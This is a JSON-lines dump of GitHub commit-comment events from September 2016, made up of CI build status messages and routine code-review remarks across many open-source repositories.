{"id":"4574144724","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":19054394,"position":null,"line":null,"path":null,"commit_id":"e856dcd4d1db48cf521da2cfabba5226a9d074cd","created_at":"2016-09-16T13:48:44Z","updated_at":"2016-09-16T13:48:44Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#VvGo-I0iR-WmxUEg5O2z5g"}},"created_at":"2016-09-16T13:48:44Z"}
{"id":"4574144788","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19054395,"position":null,"line":null,"path":null,"commit_id":"020694e33e6eea72b0b67e595e5f6187adff998e","created_at":"2016-09-16T13:48:45Z","updated_at":"2016-09-16T13:48:45Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1027](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13439&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Exit code 1 (new) Build time: 00:04:21"}},"created_at":"2016-09-16T13:48:45Z"}
{"id":"4574146028","type":"CommitCommentEvent","actor":{"login":"rustyautopsy"},"repo":{"name":"alex/letsencrypt-aws"},"payload":{"comment":{"id":19054401,"position":null,"line":null,"path":null,"commit_id":"2fe90ec3c10d9bd31788373fd5e709f8c60ddf48","created_at":"2016-09-16T13:48:58Z","updated_at":"2016-09-16T13:48:58Z","body":"Thanks!"}},"created_at":"2016-09-16T13:48:58Z"}
{"id":"4574146195","type":"CommitCommentEvent","actor":{"login":"brian-brazil"},"repo":{"name":"prometheus/snmp_exporter"},"payload":{"comment":{"id":19054402,"position":70,"line":202,"path":"collector.go","commit_id":"3f5b5408c825d1c9fa9e5ddf0cd1798389885a9f","created_at":"2016-09-16T13:49:01Z","updated_at":"2016-09-16T13:49:01Z","body":"It is indeed, though it'd be an Infof as it means our code isn't supporting all the types it should."}},"created_at":"2016-09-16T13:49:01Z"}
{"id":"4574147014","type":"CommitCommentEvent","actor":{"login":"fpavageau"},"repo":{"name":"fpavageau/neo4j-sproc-compiler"},"payload":{"comment":{"id":19054405,"position":null,"line":null,"path":null,"commit_id":"7d9b20778bfd1a1ed6bb3afea560e28141c554c1","created_at":"2016-09-16T13:49:11Z","updated_at":"2016-09-16T13:49:11Z","body":"For the shade plugin, well, it's either a bug or a feature 😄 : I can think of arguments both for including or excluding the optional dependency.\r\n\r\nI can leave `<optional>true</optional>`. I guess that's useful if you need to depend on the procedures library to run an embedded Neo4j instance with them, I hadn't thought about that use case."}},"created_at":"2016-09-16T13:49:11Z"}
{"id":"4574147401","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19054406,"position":null,"line":null,"path":null,"commit_id":"feb82bcc8257ac6e175bf12e8ea5c50f1008274e","created_at":"2016-09-16T13:49:15Z","updated_at":"2016-09-16T13:49:15Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1025](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13436&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 247, ignored: 3 Build time: 00:09:40"}},"created_at":"2016-09-16T13:49:15Z"}
{"id":"4574148321","type":"CommitCommentEvent","actor":{"login":"dothework"},"repo":{"name":"vanwykjd/Blocitoff"},"payload":{"comment":{"id":19054409,"position":null,"line":null,"path":null,"commit_id":"6fc19d0d84fcbb4b7e11ec7b3efa3044255da6c8","created_at":"2016-09-16T13:49:24Z","updated_at":"2016-09-16T13:49:24Z","body":"@vanwykjd Looks good here. Nice. "}},"created_at":"2016-09-16T13:49:24Z"}
{"id":"4574152910","type":"CommitCommentEvent","actor":{"login":"adeas31"},"repo":{"name":"vwaurich/OMEdit"},"payload":{"comment":{"id":19054417,"position":null,"line":null,"path":null,"commit_id":"4793ccf7a3350639c34649ac2d8becb655988f22","created_at":"2016-09-16T13:50:19Z","updated_at":"2016-09-16T13:50:19Z","body":"Can you please update your editor to use spaces instead of tabs. We prefer indentation of 2 spaces."}},"created_at":"2016-09-16T13:50:19Z"}
{"id":"4574153777","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19054420,"position":null,"line":null,"path":null,"commit_id":"e62d81544e039f42d2aa972c24d784702348565b","created_at":"2016-09-16T13:50:27Z","updated_at":"2016-09-16T13:50:27Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1026](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13437&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 247, ignored: 3 Build time: 00:08:01"}},"created_at":"2016-09-16T13:50:27Z"}
{"id":"4574155470","type":"CommitCommentEvent","actor":{"login":"fadenb"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19054427,"position":null,"line":null,"path":null,"commit_id":"e85e51d41f0f3be40490b0de9a76f20f3685659c","created_at":"2016-09-16T13:50:46Z","updated_at":"2016-09-16T13:50:46Z","body":"Thx, just cherry-picked this commit and it fixed my issue of being unable to login."}},"created_at":"2016-09-16T13:50:46Z"}
{"id":"4574164793","type":"CommitCommentEvent","actor":{"login":"shashi"},"repo":{"name":"rohitvarkey/ThreeJS.jl"},"payload":{"comment":{"id":19054461,"position":6,"line":17,"path":"examples/raycaster.jl","commit_id":"214666dda5aa3491cd581abab9a58624d7558b7c","created_at":"2016-09-16T13:52:34Z","updated_at":"2016-09-16T13:52:34Z","body":"What does the dict in this signal contain? Could making a Julia type for point and deciding it with `interpret` be useful?"}},"created_at":"2016-09-16T13:52:34Z"}
{"id":"4574166776","type":"CommitCommentEvent","actor":{"login":"slarew"},"repo":{"name":"slarew/julia"},"payload":{"comment":{"id":19054468,"position":null,"line":null,"path":null,"commit_id":"75fa2e15453af87be5900528bde5332d5e3b92ae","created_at":"2016-09-16T13:52:57Z","updated_at":"2016-09-16T13:52:57Z","body":"There are some bigger issues with enabling the App Sandbox that need some thinking and design.  \r\n\r\n1. The Pkg system breaks everywhere due to file system access issues. \r\n2. On launch, the current working directory of `julia` is its container home directory. e.g. `~/Library/Containers/org.julialang.julia/Data` and any files passed as command line arguments are not readable unless they are inside the container.\r\n\r\nThere are probably more issues that I have not run into yet.\r\n\r\nThe other option that Apple would probably not officially approve of is to write a custom sandbox profile for the julia binary.  Many low level system daemons on osx are not App Sandbox proper but have custom sandbox profiles."}},"created_at":"2016-09-16T13:52:57Z"}
{"id":"4574168478","type":"CommitCommentEvent","actor":{"login":"wanamr87"},"repo":{"name":"creativecommons/bootstrap-mediawiki"},"payload":{"comment":{"id":19054472,"position":null,"line":null,"path":null,"commit_id":"446b0fbf9df0320ee17decc6a638d32e9a0bbbbd","created_at":"2016-09-16T13:53:17Z","updated_at":"2016-09-16T13:53:17Z","body":"Ok"}},"created_at":"2016-09-16T13:53:17Z"}
{"id":"4574171031","type":"CommitCommentEvent","actor":{"login":"silbermm"},"repo":{"name":"crdschurch/SS-CMS"},"payload":{"comment":{"id":19054484,"position":null,"line":null,"path":null,"commit_id":"11a845fe055fc187dfd2ff7e13ddc6ca4fe949f1","created_at":"2016-09-16T13:53:46Z","updated_at":"2016-09-16T13:53:46Z","body":"TeamCity Code :: 1. Development :: CMS :: Features [Build 44](http://mp-ci.centralus.cloudapp.azure.com/viewLog.html?buildId=8585&buildTypeId=Code_Development_Cms_Features&guest=1) is now running\n"}},"created_at":"2016-09-16T13:53:46Z"}
{"id":"4574172116","type":"CommitCommentEvent","actor":{"login":"wanamr87"},"repo":{"name":"creativecommons/bootstrap-mediawiki"},"payload":{"comment":{"id":19054491,"position":null,"line":null,"path":null,"commit_id":"446b0fbf9df0320ee17decc6a638d32e9a0bbbbd","created_at":"2016-09-16T13:53:56Z","updated_at":"2016-09-16T13:53:56Z","body":"\n\nDihantar dari telefon pintar Sony Xperia™ saya\n\nwanamr87 <notifications@github.com> menulis:\n\n>google\n>\n>—\n>You are receiving this because you are subscribed to this thread.\n>Reply to this email directly, view it on GitHub, or mute the thread.￼\n>\n>{\"api_version\":\"1.0\",\"publisher\":{\"api_key\":\"05dde50f1d1a384dd78767c55493e4bb\",\"name\":\"GitHub\"},\"entity\":{\"external_key\":\"github/creativecommons/bootstrap-mediawiki\",\"title\":\"creativecommons/bootstrap-mediawiki\",\"subtitle\":\"GitHub repository\",\"main_image_url\":\"https://cloud.githubusercontent.com/assets/143418/17495839/a5054eac-5d88-11e6-95fc-7290892c7bb5.png\",\"avatar_image_url\":\"https://cloud.githubusercontent.com/assets/143418/15842166/7c72db34-2c0b-11e6-9aed-b52498112777.png\",\"action\":{\"name\":\"Open in GitHub\",\"url\":\"https://github.com/creativecommons/bootstrap-mediawiki\"}},\"updates\":{\"snippets\":[{\"icon\":\"PERSON\",\"message\":\"@wanamr87 on 446b0fb: google\"}],\"action\":{\"name\":\"View Commit\",\"url\":\"https://github.com/creativecommons/bootstrap-mediawiki/commit/446b0fbf9df0320ee17decc6a638d32e9a0bbbbd#commitcomment-19051693\"}}}"}},"created_at":"2016-09-16T13:53:56Z"}
{"id":"4574173078","type":"CommitCommentEvent","actor":{"login":"silbermm"},"repo":{"name":"crdschurch/SS-CMS"},"payload":{"comment":{"id":19054493,"position":null,"line":null,"path":null,"commit_id":"11a845fe055fc187dfd2ff7e13ddc6ca4fe949f1","created_at":"2016-09-16T13:54:10Z","updated_at":"2016-09-16T13:54:10Z","body":"TeamCity Code :: 1. Development :: CMS :: Features [Build 44](http://mp-ci.centralus.cloudapp.azure.com/viewLog.html?buildId=8585&buildTypeId=Code_Development_Cms_Features&guest=1) outcome was **SUCCESS**\nSummary: Running Build time: 00:00:24"}},"created_at":"2016-09-16T13:54:10Z"}
{"id":"4574173931","type":"CommitCommentEvent","actor":{"login":"adrian-olczyk"},"repo":{"name":"smsapi/smsapi-javascript-client"},"payload":{"comment":{"id":19054495,"position":null,"line":null,"path":null,"commit_id":"1fa17c7877932478d1e058dc153c4517b21735f8","created_at":"2016-09-16T13:54:18Z","updated_at":"2016-09-16T13:54:18Z","body":"Nie jestem pewny czy przy statusie `WAITING` dalsze elementy payloadu są dostępne. Sprawdzałeś? "}},"created_at":"2016-09-16T13:54:18Z"}
{"id":"4574180216","type":"CommitCommentEvent","actor":{"login":"giorgiosironi"},"repo":{"name":"elifesciences/builder"},"payload":{"comment":{"id":19054520,"position":null,"line":null,"path":null,"commit_id":"8be745f6d7c94bf89af45f638a2f08ac3ab93b1d","created_at":"2016-09-16T13:55:25Z","updated_at":"2016-09-16T13:55:25Z","body":"Ok, I thought it was idiomatic"}},"created_at":"2016-09-16T13:55:25Z"}
{"id":"4574183822","type":"CommitCommentEvent","actor":{"login":"IsaacWeiss"},"repo":{"name":"musescore/MuseScore"},"payload":{"comment":{"id":19054527,"position":null,"line":null,"path":null,"commit_id":"1b7daeb3830fbc6b706610eb0f2fd19f419c5c7a","created_at":"2016-09-16T13:56:04Z","updated_at":"2016-09-16T13:56:04Z","body":"Remember this?\r\n![MuseScore 3 spacing](https://musescore.org/sites/musescore.org/files/imagecache/image-700/3.0%20image.png)\r\n\r\nI'm guessing the reason the left side of the dialog is stretched out is here: \r\n![screen shot 2016-09-16 at 9 48 58 am](https://cloud.githubusercontent.com/assets/11616153/18588188/6c042e64-7bf3-11e6-9936-735fbd4e8efb.png)\r\nIs it possible to allow Landscape line to extend under the Width and Height fields?"}},"created_at":"2016-09-16T13:56:04Z"}
{"id":"4574185229","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19054532,"position":7,"line":137,"path":"application/config/internal.php","commit_id":"fefb8fef6465dc807febd59f281a2f65d05e0e5d","created_at":"2016-09-16T13:56:20Z","updated_at":"2016-09-16T13:56:20Z","body":"https://bugs.limesurvey.org/view.php?id=11661"}},"created_at":"2016-09-16T13:56:20Z"}
{"id":"4574189193","type":"CommitCommentEvent","actor":{"login":"SeanTAllen"},"repo":{"name":"ponylang/ponyc"},"payload":{"comment":{"id":19054544,"position":null,"line":null,"path":null,"commit_id":"b27f04e11dee554ebd4d4ec087381b8db3baaefe","created_at":"2016-09-16T13:56:59Z","updated_at":"2016-09-16T13:56:59Z","body":"I'm fairly uncomfortable with turning off a feature to get travis passing. Was this solely for the sake of travis? If yes, I think we should have changed travis.yml not turn LTO off for every OSX user as a default.\r\n\r\n"}},"created_at":"2016-09-16T13:56:59Z"}
{"id":"4574191299","type":"CommitCommentEvent","actor":{"login":"euangoddard"},"repo":{"name":"2degrees/djeneralize"},"payload":{"comment":{"id":19054551,"position":null,"line":null,"path":null,"commit_id":"4989f81a9de5f78afb0465a636b46efbbe0c0592","created_at":"2016-09-16T13:57:22Z","updated_at":"2016-09-16T13:57:22Z","body":"One for you, @LuRsT !"}},"created_at":"2016-09-16T13:57:22Z"}
{"id":"4574191546","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19054552,"position":null,"line":null,"path":null,"commit_id":"62a6ca5dd7e86ce4808815043dc34f84c3d88ec7","created_at":"2016-09-16T13:57:25Z","updated_at":"2016-09-16T13:57:25Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1028](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13443&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-16T13:57:25Z"}
{"id":"4574193591","type":"CommitCommentEvent","actor":{"login":"scottmarlow"},"repo":{"name":"wildfly/wildfly"},"payload":{"comment":{"id":19054556,"position":null,"line":null,"path":null,"commit_id":"3bff5fde3cfc23f3999dc75c320029e69c562c40","created_at":"2016-09-16T13:57:47Z","updated_at":"2016-09-16T13:57:47Z","body":"never mind, I made the same fix locally for https://issues.jboss.org/browse/WFLY-7108.  I will look at the WFLY-7075 extension idea next.  "}},"created_at":"2016-09-16T13:57:47Z"}
{"id":"4574195176","type":"CommitCommentEvent","actor":{"login":"kaki88"},"repo":{"name":"eBrigade/eBrigadeV2"},"payload":{"comment":{"id":19054559,"position":null,"line":null,"path":null,"commit_id":"278714bb0c33dad45651b29172e7a6b06a418e1e","created_at":"2016-09-16T13:58:03Z","updated_at":"2016-09-16T13:58:03Z","body":"Bonjour,\r\nQuelle methode/outil utiliser pour générer l'arbre svp ? je ne trouve aucune fonction cakephp pour le générer (sauf dans un input....). \r\nMerci"}},"created_at":"2016-09-16T13:58:03Z"}
{"id":"4574195431","type":"CommitCommentEvent","actor":{"login":"ibrahimtaguri"},"repo":{"name":"jvandemo/angular-contentful"},"payload":{"comment":{"id":19054560,"position":1,"line":24,"path":"README.md","commit_id":"b28c02e306a3c11aeb71d2a948fd1948307d0a61","created_at":"2016-09-16T13:58:08Z","updated_at":"2016-09-16T13:58:08Z","body":" $ bower install angular-contentful\r\n"}},"created_at":"2016-09-16T13:58:08Z"}
{"id":"4574195633","type":"CommitCommentEvent","actor":{"login":"tumbili"},"repo":{"name":"PX4/Firmware"},"payload":{"comment":{"id":19054562,"position":null,"line":null,"path":null,"commit_id":"900026818b772ef848749e366b722817b3fc6fc4","created_at":"2016-09-16T13:58:10Z","updated_at":"2016-09-16T13:58:10Z","body":"@kd0aij On what OS are you on? The other targets are working on linux."}},"created_at":"2016-09-16T13:58:10Z"}
{"id":"4574199134","type":"CommitCommentEvent","actor":{"login":"bampakoa"},"repo":{"name":"ibbatta/grunt-frontend-boilerplate"},"payload":{"comment":{"id":19054576,"position":18,"line":18,"path":"app/src/app.module.js","commit_id":"5b669a389ad2faf826aea49379af906b53e183bb","created_at":"2016-09-16T13:58:47Z","updated_at":"2016-09-16T13:58:47Z","body":"@ibbatta What's the purpose of it?"}},"created_at":"2016-09-16T13:58:47Z"}
{"id":"4574204655","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":19054596,"position":null,"line":null,"path":null,"commit_id":"77e45a38e1ca4e09feed8549ab3cc83a4d7bb721","created_at":"2016-09-16T13:59:47Z","updated_at":"2016-09-16T13:59:47Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#Vt0fUOnZTT6kBnHVGi76Pw"}},"created_at":"2016-09-16T13:59:47Z"}
{"id":"4574215335","type":"CommitCommentEvent","actor":{"login":"ibbatta"},"repo":{"name":"ibbatta/grunt-frontend-boilerplate"},"payload":{"comment":{"id":19054640,"position":18,"line":18,"path":"app/src/app.module.js","commit_id":"5b669a389ad2faf826aea49379af906b53e183bb","created_at":"2016-09-16T14:01:41Z","updated_at":"2016-09-16T14:01:41Z","body":"At the moment doesn't have purpose.\r\nI pre-create a \"delay\" for a spinner / page loader at beginning"}},"created_at":"2016-09-16T14:01:41Z"}
{"id":"4574215341","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19054641,"position":null,"line":null,"path":null,"commit_id":"62a6ca5dd7e86ce4808815043dc34f84c3d88ec7","created_at":"2016-09-16T14:01:41Z","updated_at":"2016-09-16T14:01:41Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1028](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13443&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:04:16"}},"created_at":"2016-09-16T14:01:41Z"}
{"id":"4574222429","type":"CommitCommentEvent","actor":{"login":"hsatoshi"},"repo":{"name":"MengyaoShi/POSOverlay"},"payload":{"comment":{"id":19054661,"position":53,"line":3396,"path":"PixelTKFECSupervisor/src/common/PixelTKFECSupervisor.cc","commit_id":"f22dc9a82fa7830167104d1e25eacb8ae5950ceb","created_at":"2016-09-16T14:02:46Z","updated_at":"2016-09-16T14:02:46Z","body":"make this part ( form { to }  )to :\r\nM[ i ] =  data[slot][ring][ccu][channelnumber] & (1 << i)"}},"created_at":"2016-09-16T14:02:46Z"}
{"id":"4574224126","type":"CommitCommentEvent","actor":{"login":"ariel-"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19054664,"position":32,"line":731,"path":"src/server/scripts/Spells/spell_paladin.cpp","commit_id":"5b70b89cc2e4082a9953e2212b830581e767a8bd","created_at":"2016-09-16T14:03:04Z","updated_at":"2016-09-16T14:03:04Z","body":"Because checked at start time only once instead of for every proc :P"}},"created_at":"2016-09-16T14:03:04Z"}
{"id":"4574227125","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19054669,"position":null,"line":null,"path":null,"commit_id":"fefb8fef6465dc807febd59f281a2f65d05e0e5d","created_at":"2016-09-16T14:03:38Z","updated_at":"2016-09-16T14:03:38Z","body":"It's a wip : have some issue\r\n\r\n- no \"close button\"\r\n- need a \"after than\"/\"before than\" (with compare : Yii use exiting < > in the value)\r\n\r\nActually if you set validfrom : show with \"before this date\" : seem more logic to show After for validfrom and before for validuntil (if we don't have specific button for this)\r\n"}},"created_at":"2016-09-16T14:03:38Z"}
{"id":"4574229304","type":"CommitCommentEvent","actor":{"login":"bampakoa"},"repo":{"name":"ibbatta/grunt-frontend-boilerplate"},"payload":{"comment":{"id":19054673,"position":18,"line":18,"path":"app/src/app.module.js","commit_id":"5b669a389ad2faf826aea49379af906b53e183bb","created_at":"2016-09-16T14:04:00Z","updated_at":"2016-09-16T14:04:00Z","body":"I cannot see the spinner right now. Is it going to be added later?"}},"created_at":"2016-09-16T14:04:00Z"}
{"id":"4574233114","type":"CommitCommentEvent","actor":{"login":"ibrahimtaguri"},"repo":{"name":"jvandemo/angular-contentful"},"payload":{"comment":{"id":19054683,"position":12,"line":35,"path":"README.md","commit_id":"b28c02e306a3c11aeb71d2a948fd1948307d0a61","created_at":"2016-09-16T14:04:42Z","updated_at":"2016-09-16T14:04:42Z","body":"````xml\r\n <script type=\"text/javascript\" charset=\"utf-8\" src=\"bower_components/angular-contentful/dist/angular-contentful.min.js\"></script>\r\n ```"}},"created_at":"2016-09-16T14:04:42Z"}
{"id":"4574234398","type":"CommitCommentEvent","actor":{"login":"gcormier"},"repo":{"name":"gcormier/VORON"},"payload":{"comment":{"id":19054687,"position":null,"line":null,"path":null,"commit_id":"6ab7a3f5e8bf51d34de1edb008ccb3ead5f8778f","created_at":"2016-09-16T14:04:56Z","updated_at":"2016-09-16T14:04:56Z","body":"Actually, only fixes the Z aspect - did not touch the other part of those issues."}},"created_at":"2016-09-16T14:04:56Z"}
{"id":"4574236588","type":"CommitCommentEvent","actor":{"login":"lasconic"},"repo":{"name":"musescore/MuseScore"},"payload":{"comment":{"id":19054693,"position":null,"line":null,"path":null,"commit_id":"1b7daeb3830fbc6b706610eb0f2fd19f419c5c7a","created_at":"2016-09-16T14:05:21Z","updated_at":"2016-09-16T14:05:21Z","body":"Like this?\r\n\r\n<img width=\"487\" alt=\"capture d ecran 2016-09-16 16 04 51\" src=\"https://cloud.githubusercontent.com/assets/234271/18588574/57934c6a-7c27-11e6-98f8-65d8869b849a.png\">\r\n"}},"created_at":"2016-09-16T14:05:21Z"}
{"id":"4574238364","type":"CommitCommentEvent","actor":{"login":"AndreCienciaComputacao"},"repo":{"name":"AndreCienciaComputacao/LPS"},"payload":{"comment":{"id":19054695,"position":null,"line":null,"path":null,"commit_id":"f5ae898527a37b4ca9d56aae424a242144efef61","created_at":"2016-09-16T14:05:40Z","updated_at":"2016-09-16T14:05:40Z","body":"Commit inicial do sistema"}},"created_at":"2016-09-16T14:05:40Z"}
{"id":"4574241989","type":"CommitCommentEvent","actor":{"login":"shipperizer"},"repo":{"name":"oii/ogre"},"payload":{"comment":{"id":19054702,"position":69,"line":69,"path":"ogreclient/dist/vagrant-windows/OGRE/OgreClientService/OgreWrapper.cs","commit_id":"0382191baddd5eda889c3d2c093eb3b38da5d21e","created_at":"2016-09-16T14:06:19Z","updated_at":"2016-09-16T14:06:19Z","body":"Hit and sunk :("}},"created_at":"2016-09-16T14:06:19Z"}
{"id":"4574247506","type":"CommitCommentEvent","actor":{"login":"olleharstedt"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19054713,"position":7,"line":137,"path":"application/config/internal.php","commit_id":"fefb8fef6465dc807febd59f281a2f65d05e0e5d","created_at":"2016-09-16T14:07:19Z","updated_at":"2016-09-16T14:07:19Z","body":"This only logs if category is explicitly set to 'debug'."}},"created_at":"2016-09-16T14:07:19Z"}
{"id":"4574254690","type":"CommitCommentEvent","actor":{"login":"IsaacWeiss"},"repo":{"name":"musescore/MuseScore"},"payload":{"comment":{"id":19054733,"position":null,"line":null,"path":null,"commit_id":"1b7daeb3830fbc6b706610eb0f2fd19f419c5c7a","created_at":"2016-09-16T14:08:38Z","updated_at":"2016-09-16T14:08:38Z","body":"Even better like this: ![untitled](https://cloud.githubusercontent.com/assets/11616153/18588683/7e1aa676-7bf5-11e6-9bf1-abe03c03ba56.png) Is it possible?\r\n"}},"created_at":"2016-09-16T14:08:38Z"}
{"id":"4574257884","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19054741,"position":null,"line":null,"path":null,"commit_id":"13627153888d3ac71645178a674491bc8151b8b6","created_at":"2016-09-16T14:09:17Z","updated_at":"2016-09-16T14:09:17Z","body":"develop (mjwitte) - x86_64-MacOS-10.9-clang: OK (1762 of 1762 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-13627153888d3ac71645178a674491bc8151b8b6-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-13627153888d3ac71645178a674491bc8151b8b6-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-16T14:09:17Z"}
{"id":"4574261316","type":"CommitCommentEvent","actor":{"login":"ariel-"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19054755,"position":11,"line":20730,"path":"src/server/game/Entities/Player/Player.cpp","commit_id":"9d5da3dd37103f368a914a4a70dc9f847e743761","created_at":"2016-09-16T14:09:53Z","updated_at":"2016-09-16T14:09:53Z","body":"It shouldn't cause any, in fact you'll get more procs, because the prev commit was silently discarding spellmod aura procs in some cases."}},"created_at":"2016-09-16T14:09:53Z"}
{"id":"4574261994","type":"CommitCommentEvent","actor":{"login":"lasconic"},"repo":{"name":"musescore/MuseScore"},"payload":{"comment":{"id":19054758,"position":null,"line":null,"path":null,"commit_id":"1b7daeb3830fbc6b706610eb0f2fd19f419c5c7a","created_at":"2016-09-16T14:10:02Z","updated_at":"2016-09-16T14:10:02Z","body":"What about? (See also units)\r\n<img width=\"487\" alt=\"capture d ecran 2016-09-16 16 09 32\" src=\"https://cloud.githubusercontent.com/assets/234271/18588728/fc7567f4-7c27-11e6-8b2b-aedcddb0ba5a.png\">\r\n"}},"created_at":"2016-09-16T14:10:02Z"}
{"id":"4574262105","type":"CommitCommentEvent","actor":{"login":"samueltardieu"},"repo":{"name":"cgeo/cgeo"},"payload":{"comment":{"id":19054759,"position":null,"line":null,"path":null,"commit_id":"61fbe4e3ccff5becc20c505a45aaf46a5d19dc82","created_at":"2016-09-16T14:10:03Z","updated_at":"2016-09-16T14:10:03Z","body":"I'll open an issue and contribute some code."}},"created_at":"2016-09-16T14:10:03Z"}
{"id":"4574263920","type":"CommitCommentEvent","actor":{"login":"aroxby"},"repo":{"name":"ZombieRoxtar/LxssLoader"},"payload":{"comment":{"id":19054761,"position":34,"line":34,"path":"LxssLoader/main.cpp","commit_id":"4cc84b9d2e1e5ce14f1e74b6f0cc467cae185b60","created_at":"2016-09-16T14:10:23Z","updated_at":"2016-09-16T14:10:23Z","body":"That's odd.  I would expect `PCCH[]` to be `char*[]`.  It looks abnormal for your `main` to be `(int argc, char *argv[])`.  Anyway, it's not broken now so maybe you shouldn't mess with it."}},"created_at":"2016-09-16T14:10:23Z"}
{"id":"4574267432","type":"CommitCommentEvent","actor":{"login":"aroxby"},"repo":{"name":"ZombieRoxtar/LxssLoader"},"payload":{"comment":{"id":19054767,"position":76,"line":76,"path":"LxssLoader/main.cpp","commit_id":"4cc84b9d2e1e5ce14f1e74b6f0cc467cae185b60","created_at":"2016-09-16T14:11:01Z","updated_at":"2016-09-16T14:11:01Z","body":"Got it.  Thanks!"}},"created_at":"2016-09-16T14:11:01Z"}
{"id":"4574270169","type":"CommitCommentEvent","actor":{"login":"IsaacWeiss"},"repo":{"name":"musescore/MuseScore"},"payload":{"comment":{"id":19054776,"position":null,"line":null,"path":null,"commit_id":"1b7daeb3830fbc6b706610eb0f2fd19f419c5c7a","created_at":"2016-09-16T14:11:30Z","updated_at":"2016-09-16T14:11:30Z","body":"I like it."}},"created_at":"2016-09-16T14:11:30Z"}
{"id":"4574277528","type":"CommitCommentEvent","actor":{"login":"jo-pol"},"repo":{"name":"DANS-KNAW/course-scala"},"payload":{"comment":{"id":19054797,"position":4,"line":4,"path":"src/main/scala/workshop3/assignments/Employee.md","commit_id":"9bba11d5a87308652c0c0b35a17df3886fac2f87","created_at":"2016-09-16T14:12:49Z","updated_at":"2016-09-16T14:12:49Z","body":"I can't fine the Employee.sc"}},"created_at":"2016-09-16T14:12:49Z"}
{"id":"4574280735","type":"CommitCommentEvent","actor":{"login":"zhan520"},"repo":{"name":"zhan520/Shop01"},"payload":{"comment":{"id":19054802,"position":null,"line":null,"path":null,"commit_id":"3ba3fc618a4db7ebd84ff7ab7a8f720fa2126f62","created_at":"2016-09-16T14:13:25Z","updated_at":"2016-09-16T14:13:25Z","body":"add AAAAAAAAAAAAAAAAAA"}},"created_at":"2016-09-16T14:13:25Z"}
{"id":"4574287018","type":"CommitCommentEvent","actor":{"login":"OliverJAsh"},"repo":{"name":"cubik-oss/redux-reducer-effects"},"payload":{"comment":{"id":19054814,"position":7,"line":29,"path":"src/redux-reducer-effects.ts","commit_id":"9971a4322e876670f13a135516a4296e03ee4328","created_at":"2016-09-16T14:14:32Z","updated_at":"2016-09-16T14:14:32Z","body":"We only want one of these surely? Also good to be explicit about the condition, i.e. `result === undefined`, to avoid situations where result is some other falsy value (e.g. `0` or `''`)"}},"created_at":"2016-09-16T14:14:32Z"}
{"id":"4574288087","type":"CommitCommentEvent","actor":{"login":"dgroch"},"repo":{"name":"meteor/meteor"},"payload":{"comment":{"id":19054818,"position":null,"line":null,"path":null,"commit_id":"f475e379ab9beb6db73a8091389309bdafc16c47","created_at":"2016-09-16T14:14:41Z","updated_at":"2016-09-16T14:14:41Z","body":"hoooray!!"}},"created_at":"2016-09-16T14:14:41Z"}
{"id":"4574288921","type":"CommitCommentEvent","actor":{"login":"torkelo"},"repo":{"name":"grafana/grafana"},"payload":{"comment":{"id":19054821,"position":null,"line":null,"path":null,"commit_id":"05d43999dc83c2adc5bda27eb8e41e0b762c35ea","created_at":"2016-09-16T14:14:52Z","updated_at":"2016-09-16T14:14:52Z","body":"not sure I understand the option, what time does use when the option is unchecked?"}},"created_at":"2016-09-16T14:14:52Z"}
